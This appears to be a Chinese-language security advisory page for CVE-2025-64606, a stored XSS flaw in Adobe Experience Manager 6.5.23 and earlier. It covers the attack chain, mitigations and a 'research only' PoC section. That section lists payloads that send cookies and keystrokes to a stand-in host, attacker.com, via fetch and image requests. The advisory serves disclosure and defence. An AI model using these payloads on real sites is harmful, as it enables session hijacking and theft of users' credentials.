IPBUF安全漏洞报告
English
CVE-2025-64606 CVSS 5.4 中危

CVE-2025-64606 Adobe Experience Manager存储型XSS漏洞

披露日期: 2025-12-10
来源: [email protected]

漏洞信息

漏洞编号
CVE-2025-64606
漏洞类型
存储型XSS
CVSS评分
5.4 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
需要交互 (UI:R)
影响产品
Adobe Experience Manager

相关标签

存储型XSSAdobe Experience ManagerCVE-2025-64606跨站脚本Web应用安全AEM会话劫持

漏洞概述

CVE-2025-64606是Adobe Experience Manager中的一个存储型跨站脚本(XSS)漏洞。该漏洞影响Adobe Experience Manager 6.5.23及更早版本。攻击者作为低权限用户,可以将恶意JavaScript脚本注入到易受攻击的表单字段中。由于是存储型XSS,恶意脚本会被永久保存在服务器端,当其他用户浏览包含该漏洞字段的页面时,恶意JavaScript代码会在受害者浏览器中自动执行。成功利用此漏洞的攻击者可以窃取受害者的会话cookie、劫持用户会话、进行钓鱼攻击或修改页面内容,对用户数据安全和系统完整性造成威胁。

技术细节

Adobe Experience Manager 6.5.23及之前版本在处理用户输入的表单字段时缺乏充分的输入验证和输出编码。攻击者可以利用低权限账户在表单输入点注入恶意JavaScript代码,如<script>alert(document.cookie)</script>或<img src=x onerror=fetch('https://attacker.com/steal?c='+document.cookie)>等payload。由于系统未对用户输入进行适当的HTML实体编码或安全过滤,恶意脚本会被存储在数据库中。当其他用户访问包含该表单字段的页面时,服务器从数据库取出未经过滤的数据并返回给客户端浏览器,浏览器将其作为可执行脚本解析,从而完成攻击。这种存储型XSS比反射型XSS危害更大,因为恶意脚本会自动影响所有访问该页面的用户。

攻击链分析

STEP 1
1
攻击者使用低权限账户登录Adobe Experience Manager系统
STEP 2
2
攻击者在易受攻击的表单字段中注入恶意JavaScript代码(如<script>标签或事件处理器)
STEP 3
3
恶意脚本被存储在服务器数据库中,未经过滤或转义处理
STEP 4
4
受害者访问包含该表单字段的页面,服务器将未经过滤的数据返回给客户端
STEP 5
5
受害者浏览器解析页面时执行恶意JavaScript代码,导致Cookie窃取、会话劫持或钓鱼攻击

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
<!-- Stored XSS PoC for CVE-2025-64606 --> <!-- Inject this payload into vulnerable form fields in Adobe Experience Manager --> <!-- Basic XSS payload --> <script>alert(document.domain)</script> <!-- Cookie stealing payload --> <img src=x onerror="fetch('https://attacker.com/steal?c='+btoa(document.cookie))"> <!-- Session hijacking payload --> <script> var img = new Image(); img.src = 'https://attacker.com/log?cookie=' + encodeURIComponent(document.cookie); </script> <!-- Keylogger payload --> <script> document.addEventListener('keypress', function(e) { fetch('https://attacker.com/keys?k=' + e.key); }); </script> <!-- Example attack flow: 1. Attacker logs in with low-privileged account 2. Attacker submits malicious payload in form field 3. Payload is stored on server without sanitization 4. Victim views the page containing the vulnerable field 5. Malicious JavaScript executes in victim's browser -->

影响范围

Adobe Experience Manager <= 6.5.23

防御指南

临时缓解措施
在官方补丁发布前,可采取以下临时缓解措施:1) 限制低权限用户对表单字段的编辑权限;2) 在Web应用防火墙(WAF)上配置XSS过滤规则;3) 对所有用户输入实施严格的输入验证;4) 启用HTTP响应头的X-XSS-Protection配置;5) 监控和审计表单提交日志以检测异常行为。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表